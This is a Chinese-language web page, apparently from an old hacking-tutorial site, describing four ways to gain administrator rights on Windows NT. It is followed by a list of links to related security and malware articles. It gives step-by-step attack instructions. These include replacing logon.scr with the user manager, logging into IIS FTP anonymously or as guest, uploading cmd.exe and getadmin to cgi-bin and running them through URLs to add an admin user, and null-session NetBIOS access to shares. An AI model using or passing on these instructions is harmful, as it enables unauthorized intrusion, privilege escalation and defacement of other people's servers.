| 添加到收藏夹 | 返回目录页 | 上一篇:unix系统病毒概述 |
WinNT下使用匿名获得admin权限的几个方法
之一
如果你有普通用户帐号,有个一个很简单的方法获取nt administrator帐号:
先把c:winntsystem32下的logon.scr改名为logon.old备份
然后把usrmgr.exe改名为logon.scr
然后重新启动
logon.scr是启动时加载的程序,重新启动后,不会出现以往的登陆密码输入界 面,而是用户管理器
这时他就有权限把自己加到administrator组
不要忘记把文件名改回来啊!
之二:
下面的技术适用于不重视nt网络安全的网站,虽然要靠运气,但是人多力量大
一些 http的技术也可以供较高级的人员参考
作为初学者,进入nt网络可以采取下面的步骤:
因为nt的iis server的ftp一般都是允许anonymous匿名帐号进入的,有些anonymous
的帐号还有upload权限,我们就要攻击这类站点。因为如果不允许匿名帐号,就可能
造成明文密码在网上传输。用tcpspy的工具可以截获这些密码。现在不谈这些比较
高级的技术。
正因为允许匿名帐号ftp登陆的设定,也给我们带来了突破nt server的机会。我们用
ftp登陆一个nt server,比如:www.xxx.com(示例名):
ftp www.xxx.com connected to www.xxx.com
220 ntsvr2 microsoft ftp service (version 3.0).
ntsvr2这个东西暴露了其netbios名,那么在iis的背景下,必然会有一个iuser_ntsvr2
的用户帐号,属于domain user组,这个帐号我们以后要用来获取administrator的权限
user (www.xxx.com:(none)):anonymous
331 anonymous access allowed, send identity (e-mail name) as password.
password: 输入 guest@ 或者guest
对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码。
那么guest帐号就是一个可用的正确的用户帐号,虽然只属于domain guest组
在这种情况下我们就可以进nt server的ftp了。
进去以后,试试 cd /c ,如果运气好,改变目录成功,这时你就有了80%的把握。
现在,开始查找cgi-bin目录(或者scripts目录),进去以后,
把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin
然后输入:http://www.xxx.com/cgi-bin/getadmin.exe?iusr_saturn
大约十多秒后屏幕显示:
cgi error
这时有90%的可能是:你已经把iuser_ntsvr2升级为administrator,也就是任何访问该web
站的人都是管理员
下面可以add user:
http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:winntsystem32net.exe%20user%20
china%20news%20/add
这样就创建了一个叫china用户,密码是news,然后:
http://www.xxx.com/cgi-bin/getadmin.exe?cnn
你再用cnn的帐号登陆,就可以改web根目录的主页了,也可以用上面的cmd.exe的方法直接修改
之三:
用nt的netbios技术扫描
nbtstat -a www.xxx.com
或者
nbtstat -a www.xxx.com
这样可以得到其域的共享资源名称
net view \www.xxx.com
可以获得其机器的共享资源名称,如果有c盘
net use f: \www.xxx.com\c$
可以用f:映射其c盘
net use \111.111.111.111\ipc$ "" /user:""
之四: unix下移植过来的工具:
windows95&98的用户可以用这个tcp/ip工具去抓tcp/ip连接中的包:
windump95.exe 使用前还要下载这个库 packet95.exe
windowsnt用户的版本
windump.exe packetnt.exe
- · 配置 VMware通过令牌访问LAN
- · Debug 使用简介
- · IE即可轻松远程控制对方电脑
- · 如何利用OutLook漏洞编写病毒脚本
- · “混客绝情炸弹”源代码(1)及手工清除
- · “求职信”病毒/蠕虫行为深入分析
- · 编写感染COM与EXE文件的病毒的样例程序
- · 在Win 2003中配置ASP.net环境
- · 将病毒斩草除根
- · 手机病毒
- · 使用TCP/IP协议栈指纹进行远程操作系统辨识
- · 安全维护 IIS asp 站点的高级技巧
- · 防止内部IP地址泄漏的2种方法
- · 网络常见攻击与防范完全手册
- · Windows NT2000下的硬盘锁
- · CIH硬盘数据恢复方法与实例
- · 清除双关联木马“聪明基因”
- · 104种木马手工清除方法
- · 如何隐藏程序的运行
- · 六十四、WINOWS NT4.0下的网络安全性
- · 六十二、从DOS直接入网NT
- · 六十一、NT网的无盘工作站远程登陆
- · 六十、Windows NT4.0网络中漫游用户配置文件的建立
- · 五十九、配置广域网中的Windows NT
- · 五十八、NT Server用作Internet的网关
- · 五十六、 NT网卡和Novell网卡互用
- · 五十四、如何使NT4.0支持你的调制解调器
- · 本地攻击者利用FreeBSD4.3设计漏洞取得系统特权
- · 计算机网络系统安全漏洞分类研究
- · 利用万象来控制整个网吧
- · WIN2000的输入法入侵
- · 傲者TXT炸弹(标准版)
- · 主页木马的制作方法
- · IIS UNICODE Bug
- · BBS3000漏洞
- · CGI漏洞集锦
- · SNMP漏洞威胁网络安全
- · 安全专家欲以黑制黑
- · 用net命令使局域网文件批量同步更新
- · 安全高招:让溢出攻击远离我们
- · Firefox使用技巧六则
- · 支持Rss,优化速度:傲游1.2.0发布
- · 四十九、从DOS工作站登录NTS4.0服务器
- · 十三、WIN2000下的xcopy可以复制文件的安全设置
- · “网上邻居”如何和平共处?
- · NT的19个秘密武器
- · 如何在WIN2000下共享ADSL
- · MyIM聊天软件全接触——手把手教你玩转MyIM
- · 手把手教你玩压缩:WinRAR初级教程
- · 消除误解 认清容易被误认为病毒的系统文件
- · 用WinRAR解密木马捆绑的原理
- · 微软IE面临失宠 而使用安全性更好的浏览器
- · 支持半透明窗口,Mozilla再度更新
- · MBSA新版鉴别错误的安全设置更方便!
- · 新版六月末发布:Myie2将会改名Maxt
- · 让你的“添加/删除程序”充满个性
- · 解析微软Update在线升级功能
- · 常用的电脑操作精典秘籍
- · Windows中提高内存使用效率的绝技
- · Windows 98远程控制的实现

